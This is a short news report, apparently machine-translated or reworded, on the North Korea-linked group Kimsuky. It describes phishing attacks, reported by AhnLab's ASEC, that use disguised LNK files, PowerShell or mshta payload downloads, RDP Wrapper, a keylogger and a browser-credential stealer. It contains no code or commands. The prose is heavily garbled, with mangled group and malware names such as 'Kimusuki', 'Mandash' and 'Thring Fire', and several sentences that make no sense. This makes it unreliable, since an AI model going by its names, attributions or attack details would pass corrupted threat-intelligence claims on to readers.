According to Kimusuki, connected with North Korea nation -known as Kimusuki New conclusions from the AHNLAB security intelligence center (ASEC).
The attacks start with phishing sheets containing the Windows Fast Access File (LNK), which is disguised as Microsoft or PDF -document.
The opening of this attachment is caused by PowerShell or Mshta.exe, a legitimate Microsoft Binary designed to launch HTML applications (HTA) responsible for downloading and launching useful loads from an external source.
South Korean cybersecurity company said the attacks were over Mandash and the custom version of the deleted desktop with open source RDP wrap.
Also within the attacks there is a proxy software that allows the threat subject to establish a constant connection with the external network through the RDP.
In addition, Kimsuky was observed using a PowerShell key-based key classes, and a new Forcecopy used to copy files stored in the web browser.
“All ways where malicious software is installed are ways to install the web browser,” ASEC said. “It is assumed that the threat actor is trying to bypass the restrictions in a specific setting and steal the web -browsers configuration files where the credentials are stored.”
The use of RDP -lob and trusted persons for the commanded infected host indicates a tactical shift for Kimusuka, who has historically used the order for this purpose.
The actor of the threat, also called APT43, Black Banshee, Emerald Swer, Thring Fire, Springtail, Ta427 and Velvet Chollima, is evaluated as the General Bureau of Intelligence (RGB), North Korean Foreign Intelligence Service.
Active with at least 2012, in Kimusk Track Record Orchestration, taking into account individual engineering attacks that are able to bypass email protection. In December 2024, the genius of cybersecurity company disclosed What the crew of the crew sends phishing reports from Russian services to hold powers.
